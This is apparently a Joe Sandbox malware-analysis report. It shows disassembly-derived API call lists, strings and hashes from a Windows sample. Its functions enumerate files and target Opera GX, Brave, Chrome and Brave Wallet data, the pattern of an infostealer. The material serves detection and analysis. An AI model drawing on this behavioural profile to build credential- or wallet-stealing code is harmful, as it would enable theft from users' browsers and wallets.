Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: File$memsetstrtok_swsprintf$Find$CloseDeletelstrcat$CopyCreateFirstHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpy
String ID: %s\%s$%s\%s\%s$%s\*.*$P2#v$1#v
API String ID: 3252185717-1272344234
Opcode ID: bac86a16f3b918ed21f662073ce0404b331686c3f402ff032dd07c878e989a64
Instruction ID: 996867c3883e5c4f9d14c97c6daec3073e0067922b1a953186596bd2cd2b31e7
Opcode Fuzzy Hash: bac86a16f3b918ed21f662073ce0404b331686c3f402ff032dd07c878e989a64
Instruction Fuzzy Hash: 21C19B72900208ABDB24EBB1DC45FEE737CAF44704F54456EF915A6181EF78AB48CBA4

Function 004176E0 Relevance: 48.2, APIs: 32, Instructions: 222
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,0251A840), ref: 00417748
GetProcAddress.KERNEL32(76210000,0251A858), ref: 00417761
GetProcAddress.KERNEL32(76210000,0251A870), ref: 00417779
GetProcAddress.KERNEL32(76210000,0251A558), ref: 00417791
GetProcAddress.KERNEL32(76210000,024F4C18), ref: 004177AA
GetProcAddress.KERNEL32(76210000,024FAAE0), ref: 004177C2
GetProcAddress.KERNEL32(76210000,024FA940), ref: 004177DA
GetProcAddress.KERNEL32(76210000,0251A510), ref: 004177F3
GetProcAddress.KERNEL32(76210000,0251A7B0), ref: 0041780B
GetProcAddress.KERNEL32(76210000,0251A6C0), ref: 00417823
GetProcAddress.KERNEL32(76210000,0251A540), ref: 0041783C
GetProcAddress.KERNEL32(76210000,024FA7C0), ref: 00417854
GetProcAddress.KERNEL32(76210000,0251A618), ref: 0041786C
GetProcAddress.KERNEL32(76210000,0251A4C8), ref: 00417885
GetProcAddress.KERNEL32(76210000,024FA8A0), ref: 0041789D
GetProcAddress.KERNEL32(76210000,0251A528), ref: 004178B5
GetProcAddress.KERNEL32(76210000,0251A570), ref: 004178CE
GetProcAddress.KERNEL32(76210000,024FA7E0), ref: 004178E6
GetProcAddress.KERNEL32(76210000,0251A5B8), ref: 004178FE
GetProcAddress.KERNEL32(76210000,024FAA00), ref: 00417917
LoadLibraryA.KERNEL32(0251A5D0), ref: 00417928
LoadLibraryA.KERNEL32(0251A678), ref: 0041793A
LoadLibraryA.KERNEL32(0251A4F8), ref: 0041794C
LoadLibraryA.KERNEL32(0251A588), ref: 0041795D
LoadLibraryA.KERNEL32(0251A5A0), ref: 0041796F
GetProcAddress.KERNEL32(75B30000,0251A690), ref: 0041798B
GetProcAddress.KERNEL32(751E0000,0251A798), ref: 004179A7
GetProcAddress.KERNEL32(751E0000,0251A4E0), ref: 004179BF
GetProcAddress.KERNEL32(76910000,0251A6F0), ref: 004179DB
GetProcAddress.KERNEL32(75670000,024FA800), ref: 004179F7
GetProcAddress.KERNEL32(77310000,024F4C28), ref: 00417A13
GetProcAddress.KERNEL32(77310000,024F82A0), ref: 00417A2B

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
Instruction ID: 2148604ec22d5dc409469944cda03c78a345716d380cb9a295fa5105f019d802
Opcode Fuzzy Hash: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
Instruction Fuzzy Hash: 7CA162B5A116009FD714DFA5EE899263BFBF7C8701308751AEA06C3364E7B8A805CF95

Function 0040C2E0 Relevance: 48.0, APIs: 20, Strings: 7, Instructions: 767
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,004201E9,004201E9,00000000,?,?,?,004234C0,004201E9,?,00000000,?), ref: 0040C35C
StrCmpCA.SHLWAPI(?,004201DC), ref: 0040C38C
StrCmpCA.SHLWAPI(?,004201D8), ref: 0040C3A6

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040C43F
StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,004201E0,?,0251B778,?,004201E0,?,0251B7C8,00000000,?,?,?,004201E0), ref: 0040C5D6
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040C5F0
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6B4
DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 0040C77B
StrCmpCA.SHLWAPI(?,0251D580), ref: 0040C7AF

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B

Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(?,0251B7C8), ref: 0040C813
Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(00000000,0251B778), ref: 0040C82D

FindNextFileA.KERNELBASE(?,?), ref: 0040CD02
FindClose.KERNEL32(?), ref: 0040CD14

Strings

\BraveWallet\Preferences, xrefs: 0040C6CD
1#v, xrefs: 0040C35C
Google Chrome, xrefs: 0040CA6F
Brave, xrefs: 0040C5C5
P2#v, xrefs: 0040CD02
Preferences, xrefs: 0040C5E4
Opera GX, xrefs: 0040C42E

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CopyFind$lstrcatlstrlen$CloseDeleteFirstNext
String ID: Brave$Google Chrome$Opera GX$P2#v$Preferences$\BraveWallet\Preferences$1#v
API String ID: 480569104-2648344026
Opcode ID: 1b55b3daab9476008a26a08d9a1cac3415898c4d2aa9dbf0b5c34f43677ff7f6
Instruction ID: cbba04a03a0008995a9987146006101dde6cfe135f2cf04865d7d56680781c26
Opcode Fuzzy Hash: 1b55b3daab9476008a26a08d9a1cac3415898c4d2aa9dbf0b5c34f43677ff7f6
Instruction Fuzzy Hash: 8B522D72910108ABCB24FB71DC56EEE7379AB54304F40857EF906B25D1EF386A4CCAA5

Function 00415EA0 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 227
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00415EBC
FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
wsprintfA.USER32 ref: 00415F3B
StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
wsprintfA.USER32 ref: 00415F67
wsprintfA.USER32 ref: 00415F86
PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
lstrcatA.KERNEL32(?,0251B6F8,?,000003E8), ref: 00415FC3
lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
lstrcatA.KERNEL32(?,?), ref: 00415FE3
lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
lstrcatA.KERNEL32(?,?), ref: 00416009
CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

FindNextFileA.KERNEL32(?,?), ref: 00416160
FindClose.KERNEL32(?), ref: 00416172

Strings

1#v, xrefs: 00415ED3
P2#v, xrefs: 00416160
%s\*, xrefs: 00415EB6
%s\%s, xrefs: 00415F35, 00415F80

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
String ID: %s\%s$%s\*$P2#v$1#v
API String ID: 103870964-4226942003
Opcode ID: 45181e2e7a661bf38f08999e312f01641e132f285e8fdb548e4af71028755a5b
Instruction ID: 4f3ba6799c96e4c8b2fdef7625ad27d3c1a7b3744a2bb23c5cf2dc8a64d10888
Opcode Fuzzy Hash: 45181e2e7a661bf38f08999e312f01641e132f285e8fdb548e4af71028755a5b
Instruction Fuzzy Hash: AA818472A10218ABCB24FBB1DC45DEE777DBF44304F44557AF506A2091EF38AA48CBA5

Function 6C2635A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C2EF688,00001000), ref: 6C2635D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C2635E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C2635FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C26363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C26369F
__aulldiv.LIBCMT ref: 6C2636E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C263773
EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C26377E
LeaveCriticalSection.KERNEL32(6C2EF688), ref: 6C2637BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C2637C4
EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C2637CB
LeaveCriticalSection.KERNEL32(6C2EF688), ref: 6C263801
__aulldiv.LIBCMT ref: 6C263883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C263902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C263918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C26394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6C2635DB
QPC, xrefs: 6C2638FC
GenuntelineI, xrefs: 6C263639
AuthcAMDenti, xrefs: 6C263946
GTC, xrefs: 6C263912

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: e49cdb7d6266dd119a33729d8b7a597d521bb0de74ac0c2f96e90fdc501f4e9b
Instruction ID: 7df8f549b6aac473d67a9174324f96bc1d24a201daf3cfab46e4d3365911617f
Opcode Fuzzy Hash: e49cdb7d6266dd119a33729d8b7a597d521bb0de74ac0c2f96e90fdc501f4e9b
Instruction Fuzzy Hash: FAB1D171B083049BDB48DF29D85865ABBF5BB8E700F04892EEC99E3790D7309940CB95

Function 00401110 Relevance: 26.9, APIs: 12, Strings: 3, Instructions: 658fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,00000000,?,00000000), ref: 004012D9
StrCmpCA.SHLWAPI(?,004201DC), ref: 004012FC
StrCmpCA.SHLWAPI(?,004201D8), ref: 00401316
FindFirstFileA.KERNEL32(00000000,?,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,?,004201E0,?,?), ref: 0040140D

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

DeleteFileA.KERNEL32(00000000), ref: 00401668
FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004016A4
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004016B3
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004015F6

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004018F5

Part of subcall function 00406C20: LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9

DeleteFileA.KERNEL32(00000000), ref: 00401967
FindNextFileA.KERNEL32(00000000,?), ref: 004019A8
FindClose.KERNEL32(00000000), ref: 004019B7

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,024F8CF0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Strings

1#v, xrefs: 004012D9, 0040140D
\*.*, xrefs: 004011EB
P2#v, xrefs: 004016A4, 004019A8

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: P2#v$\*.*$1#v
API String ID: 2220404975-2075649900
Opcode ID: 0c538bca76515328641a7e56db8ddcf580096080a5c6d72293bc817e7c00e8b6
Instruction ID: 1d754b9f1f181e8b004311f1424a94fcc02efae78f4dcff2990e7204b081244d
Opcode Fuzzy Hash: 0c538bca76515328641a7e56db8ddcf580096080a5c6d72293bc817e7c00e8b6
Instruction Fuzzy Hash: FF3202729101186ADB28FBA1DC52EEE7378AF54304F54817EB506764D2EF386B4CCB68

Function 004156C0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 137stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004156DF
FindFirstFileA.KERNEL32(?,?), ref: 004156F6
StrCmpCA.SHLWAPI(?,004201DC), ref: 0041571C
StrCmpCA.SHLWAPI(?,004201D8), ref: 00415736
lstrcatA.KERNEL32(?,0251B6F8,?,00000104,?,00000104), ref: 00415774
lstrcatA.KERNEL32(?,0251B728), ref: 00415788
lstrcatA.KERNEL32(?,?), ref: 0041579C
lstrcatA.KERNEL32(?,?), ref: 004157AA
lstrcatA.KERNEL32(?,004201E0), ref: 004157BC
lstrcatA.KERNEL32(?,?), ref: 004157D0

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

FindNextFileA.KERNEL32(00000000,?), ref: 00415863
FindClose.KERNEL32(00000000), ref: 00415872

Strings

1#v, xrefs: 004156F6
P2#v, xrefs: 00415863
%s\%s, xrefs: 004156D9

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpywsprintf
String ID: %s\%s$P2#v$1#v
API String ID: 1833283839-1025293131
Opcode ID: 088617f1942f7832ed609225cd03f2e6ecafa724ec30b0044644fc2d99f9115c
Instruction ID: 0b78cd701ac643c87a03d62035dd32dfabddf56532c9e59c0612692b5200a2eb
Opcode Fuzzy Hash: 088617f1942f7832ed609225cd03f2e6ecafa724ec30b0044644fc2d99f9115c
Instruction Fuzzy Hash: 9B41BAB2510218ABCB14FBB0DC85DEE337DAF84304F4485ADF605A2091EB749B88CFA5

Function 0041BD50 Relevance: 25.1, APIs: 12, Strings: 2, Instructions: 634COMMON

Download Yara Rule

Strings

UT, xrefs: 0041C032
/, xrefs: 0041BDEC

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: f1844ba8d307be4bb8c9dfc5fa30b6fb925a5f90da864f4c250fcf0ebdf003f7
Instruction ID: fc7b41ddac4b8287914dd5b35c20cb5f85a9e29a538cbd7399227cbcd4b87930
Opcode Fuzzy Hash: f1844ba8d307be4bb8c9dfc5fa30b6fb925a5f90da864f4c250fcf0ebdf003f7
Instruction Fuzzy Hash: 30420571A003598BCB25CF69DC807EEBBB5FF89304F1480AEE84897341D7389A95CB94

Function 0040A2C0 Relevance: 23.3, APIs: 7, Strings: 6, Instructions: 512fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
